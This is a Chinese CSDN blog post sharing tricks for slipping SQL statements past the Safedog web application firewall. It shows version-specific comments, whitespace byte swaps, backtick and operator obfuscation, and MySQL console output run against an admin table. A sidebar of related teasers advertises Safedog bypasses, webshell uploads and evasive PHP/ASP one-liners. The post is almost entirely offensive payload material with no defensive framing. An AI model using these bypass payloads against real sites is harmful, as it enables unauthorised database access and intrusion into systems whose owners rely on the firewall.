关闭

[置顶] web站点过防火墙,安全狗常见技巧分享

1619人阅读 评论(0) 收藏 举报
分类:
*******************************************************0x001
/*!*/,


*******************************************************0x002
SELECT[0x09,


*******************************************************0x003
0x0A-0x0D,

*******************************************************0x004

0x20,0xA0]xx FROM 

*******************************************************0x005
//" ' " 


mysql> select`version`()
    -> ;
+----------------------+
| `version`()          |
+----------------------+
| 5.1.50-community-log |
+----------------------+
1 row in set (0.00 sec)


mysql> select id from qs_admins where id=1;`dfff and comment it;
+----+
| id |
+----+
|  1 |
+----+
1 row in set (0.00 sec)
 `>


*******************************************************0x006
//"-+."

mysql> select id from qs_admins;

+----+
| id |
+----+
|  1 |
+----+

1 row in set (0.00 sec)
 
mysql> select+id-1+1.from qs_admins;

+----------+
| +id-1+1. |
+----------+
|        1 |
+----------+

1 row in set (0.00 sec)

mysql> select-id-1+3.from qs_admins;
+----------+
| -id-1+3. |
+----------+
|        1 |
+----------+
1 row in set (0.00 sec)


*******************************************************0x007
//"@"

mysql> select@^1.from qs_admins;
+------+
| @^1. |
+------+
| NULL |
+------+


*******************************************************0x008
//"mysql function() as xxx"

mysql> select-count(id)test from qs_admins;

+------+

| test |

+------+

|   -1 |

+------+


1 row in set (0.00 sec)
*******************************************************0x009
//--/*![>5000]*/ 

mysql> /*!40000select*/ id from qs_admins;
+----+
| id |
+----+
|  1 |
+----+

1 row in set (0.00 sec)

*******************************************************0x010

%20=

/*? =?*/

0
0
查看评论
发表评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场

网站入侵检测之全方位突破安全狗

一、前言 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。 最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过,下...
  • xysoul
  • xysoul
  • 2015-05-03 19:02
  • 2673

绕过网站安全狗拦截,上传Webshell技巧总结(附免杀PHP一句话)

*本文原创作者:1_2,本文属FreeBuf原创奖励计划,未经许可禁止转载 这篇文章我介绍一下我所知道的绕过网站安全狗上传WebShell的方法。 思路是:修改HTTP请求,构成畸形HTTP请...
  • qq_27446553
  • qq_27446553
  • 2017-01-18 02:25
  • 3507

服务器安全狗Linux版本之使用一二浅谈

最近用了下www.safedog.cn的服务器安全狗,使用半个月,把使用心得与大家分享。 为什么要用这个软件,源于一个偶然的事件;年前,发现一个项目,在访问的时候变得很慢,但tomcat日志显示没有...
  • lu_yonggang
  • lu_yonggang
  • 2017-02-04 13:48
  • 1835

总结坑自己的一天——关于一个叫“安全狗”的软件

好好总结坑自己的一天。 坑1 安装安全狗软件,没有区分版本。我应该用apache版本,却安装了IIS版本,引发了一系列的麻烦 坑2 由于安装了IIS版本,我的apache启动不了,被迫换端口(怒换...
  • hsj_csdn
  • hsj_csdn
  • 2017-05-29 15:58
  • 718

突破安全狗和360网站卫士

突破安全狗和360网站卫士    进来蛋疼 肾是疼 可能是测试娃娃测试的太多了。前几天朋友让我帮他检测下他的网站安全性,网站发来一看。哇靠,又是安全狗,又是360网站卫士,这可怎好...
  • h4ck0ne
  • h4ck0ne
  • 2016-01-23 17:46
  • 712

安全狗下加用户的又一方法

命令行下操作 tasklist |find “Safe” 最后一个进程SafeDogGuardCenter.exe是关键,记下它的PID:1032 然后接连两个指...
  • ww122081351
  • ww122081351
  • 2014-01-30 09:49
  • 1434

中国菜刀Cknife(C刀)自定义模式秒过安全狗. php过狗一句话,asp过狗一句话.

PHP自定义模式过狗代码,ASP自定义模式过狗代码.
  • settoken
  • settoken
  • 2016-03-22 14:12
  • 2824

云锁和安全狗哪个好 Bypass阿里云盾、百度云加速、安全宝、安全狗、云锁、360主机卫士SQL注入防御-系统/上网/安全

安全只有相对,没有绝对。(人才是最大的危险) Mysql在执行语句时,#注释将忽略掉"当前行"后面的所有语句,但是即使忽略了注释后面的语句,遇到换行的话还是会紧接注释之前的语句继续执行。 ...
  • English0523
  • English0523
  • 2017-06-21 11:03
  • 2686

win7防火墙入站规则 出站规则 什么意思

转: win7防火墙入站规则 出站规则 什么意思 win7防火墙入站规则:别人电脑访问自己电脑的规则; win7防火墙出站规则:自己电脑访问别人电脑的规则。 比如:要开放tcp 44...
  • liuhhaiffeng
  • liuhhaiffeng
  • 2017-05-15 13:51
  • 2333

突破安全狗上传文件

测试站  http://zuozuo.58day.com/upimg/Upfile_Photo.asp  可双文件上传更方遍   和南方的很像,我们就直接本地构造省时间:   ...
  • xysoul
  • xysoul
  • 2015-05-03 19:07
  • 1641
    个人资料
    • 访问:740379次
    • 积分:8616
    • 等级:
    • 排名:第2633名
    • 原创:116篇
    • 转载:68篇
    • 译文:7篇
    • 评论:63条
    最新评论